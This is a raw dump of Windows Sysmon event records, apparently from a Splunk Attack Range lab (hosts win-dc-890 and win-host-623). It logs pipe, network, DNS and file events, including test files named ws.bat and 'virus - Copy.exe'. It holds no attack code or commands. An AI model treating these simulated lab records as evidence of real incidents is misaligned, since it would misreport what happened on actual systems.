Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001047274Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:48:06.133{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.3924.430.168737781C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001047273Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:48:06.133{466BC892-53D9-60E8-E60F-00000000CF01}3924\chrome.3924.430.168737781C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000806789Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:07.506{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F60102028FCEB62B873674FF9CC164C,SHA256=0E4EA710B67FC477687EF61D250B0DCCC5E81D3001815557EF06D8180F263E31,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047281Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:59.753{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50962-false10.0.1.12-8000- 354300x80000000000000001047280Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:59.244{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57209-false10.0.1.14win-dc-890.attackrange.local49676- 
23542300x80000000000000001047279Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:07.602{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C71C67B285AE52A32FE503C3A6B4852,SHA256=25587E3AE94C85ACA6FBA314BE3B2589AD0B9F58CA86485F819E4C161F82ACA5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806788Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:05.549{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-10074-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001047282Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:08.616{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=357A5B22C9265F6A835C54E34A6ACC69,SHA256=ED2F4EA5D0B70C644CA63972C1A4619F9BFF6170BA54782E572887E4AB311A65,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806791Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:08.522{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48D5DBBA7B57D475055E7D25CA73FFDD,SHA256=CEBB62D27BD20D4C824EC5E8AEB6BC72E5E7D545E12D15FEF71756AEA292DF77,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806790Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:48:05.845{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57209-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x80000000000000001047283Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:09.631{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=378EFA370F67656C080F845FC31A9330,SHA256=7719259F8EA1EEB12864122DFAF1BAF01E80C9C29862FED4EF45C8B6A8EED541,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806793Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:09.553{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E852ACE3D077D90036A6354C0B1392E1,SHA256=A5CF5F8C9981B384939DF0BCB32F0A079E5794E35435C286AC6546FA25F98173,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806792Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:07.186{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57210-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806794Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:10.553{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=762E679C2961DC33449EE8F038E10537,SHA256=DEEFA6BB301219A7C21F62CBE06BCAF9F4C56BB4CC5B4EC05BA5903E1A4A4CFB,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001047285Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:10.968{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exeC:\Temp\test\ws.bat2021-07-12 07:48:10.968 23542300x80000000000000001047284Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:10.648{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6D59565B27F726882981AB08A33FC04,SHA256=4EC02FFB30AA41C8A00017AB1E83DE42517EF61DB5189599B931E1E57FD93138,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806795Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:11.553{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6D6D40C2AD26A75EFCC688EFEFA858C7,SHA256=C6914B7704D4BF97F1410655623A3EFD82FC957FFFAD7522A1E60E6AAB6A37CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047286Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:11.667{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8524F21E34A1D83E7DEC15DB6CE6D87,SHA256=57B283EDBB253327B91D39569D37A7482340D75C1E0BC94FB10F37760CA6FBEB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047287Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:12.682{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=742838FAE294EBE49EDDACE13820E9E1,SHA256=F57C9C326CCD856E9A03E06F8102209B1855895D667E77E323311CC41C7DA75B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806796Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:12.600{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F627D46AA8922EE4A250A0779BA8D0DC,SHA256=AFB94ADC5FDDA9DE4C1FBCF7315B87440CB3606D77268BD1EE0896CB69F4760B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806797Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:13.616{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=29978AB9D281AEBFD808C0BC54B54FDB,SHA256=F318AE4C03378263210AC87C5F691DD518B16AA97FE343B80E93DC0524A4C764,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047288Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:13.697{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=309EECA8ED7717A5061ECA99AEBDBB78,SHA256=C966C387785762C0E1B9405BB1933C53173B64C866467BCA9D3CA020628B62AB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806799Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:14.629{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F169DD8A4B92C1FE19C3599338254021,SHA256=549A4133BBBC39E8F32B09B83F4606D1A48A5CC889118C335889A343B8BF730C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047330Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:14.745{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45C0B0282C82515691F80B46109CC970,SHA256=AF96AC5C235BF6E22492FB8DDD9EB503FACDE65E9708713F97BADA610A438150,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806798Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:12.295{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57211-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001047329Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.970{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local55715- 354300x80000000000000001047328Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.969{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local63782- 354300x80000000000000001047327Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.968{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55054- 354300x80000000000000001047326Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.967{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local61136- 354300x80000000000000001047325Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.965{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61718- 354300x80000000000000001047324Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.964{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local63948- 354300x80000000000000001047323Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.963{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local56018- 354300x80000000000000001047322Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.963{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local56031- 354300x80000000000000001047321Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.961{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local58627- 354300x80000000000000001047320Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.960{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local63965- 354300x80000000000000001047319Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.959{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local59564- 354300x80000000000000001047318Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.957{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local59824- 354300x80000000000000001047317Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.956{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local54709- 354300x80000000000000001047316Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.955{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local64188- 354300x80000000000000001047315Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.954{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local53687- 354300x80000000000000001047314Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.953{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local58849- 354300x80000000000000001047313Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.952{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local65455- 354300x80000000000000001047312Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.950{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local61152- 354300x80000000000000001047311Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.949{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local60493- 354300x80000000000000001047310Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.947{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local54078- 354300x80000000000000001047309Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.945{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53744- 354300x80000000000000001047308Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.945{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62085- 354300x80000000000000001047307Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.937{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53775- 354300x80000000000000001047306Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.936{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local58883- 354300x80000000000000001047305Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.936{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT 
AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55404- 354300x80000000000000001047304Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.934{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local53248- 354300x80000000000000001047303Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.934{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local55794- 354300x80000000000000001047302Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.933{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local57718- 354300x80000000000000001047301Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.932{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local60908- 354300x80000000000000001047300Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.929{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local53domainfalse10.0.1.14win-dc-890.attackrange.local62674- 354300x80000000000000001047299Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.929{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-890.attackrange.local62674-false10.0.1.14win-dc-890.attackrange.local53domain 354300x80000000000000001047298Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.928{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62260- 354300x80000000000000001047297Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.928{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62260-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domain 354300x80000000000000001047296Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.919{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50965-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001047295Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.919{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50965-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local49666- 354300x80000000000000001047294Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:06.918{466BC892-02AF-60E8-0D00-00000000CF01}900C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50964-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 354300x80000000000000001047293Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:48:06.918{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50964-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local135epmap 23542300x80000000000000001047292Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:14.381{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACF9E7083283591250BABF71865EFFAF,SHA256=1348CB8A97087BB70CD45899F17E3E4CC98BAE3EF867EA8150210A87444FBDBF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047291Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:14.381{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=06C8AE7ED812851052778A1AFE15E838,SHA256=799F0025284F0048C041692A1F13DE94ED40841D84399DD76670D79396A8275B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047290Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:05.733{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50963-false10.0.1.12-8000- 11241100x80000000000000001047289Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localEXE2021-07-12 07:48:14.097{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Temp\test\virus - Copy.exe2021-07-12 07:47:58.225 23542300x80000000000000001047341Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:48:15.765{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F103ABF9EA1607008FE93143F2EED69A,SHA256=0E7A7660C066DF19721ED5291FB495DCCA0219BF9C99E6AF22ACFA3BE9F61D11,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806800Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:48:15.660{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=403F82C24AC86440BCABE0A480CE0221,SHA256=0EC76271AA39F92FF42FA44C876720649DC4A14D810FBE41FD817684E3AA1928,IMPHASH=00000000000000000000000000000000falsetrue 